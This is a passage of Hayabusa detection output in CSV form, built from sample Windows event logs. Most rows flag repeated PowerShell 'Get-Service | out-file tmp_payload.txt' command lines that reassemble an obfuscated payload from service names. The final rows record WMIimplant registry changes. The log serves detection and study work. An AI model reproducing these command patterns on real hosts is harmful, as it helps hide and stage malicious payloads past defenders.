+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
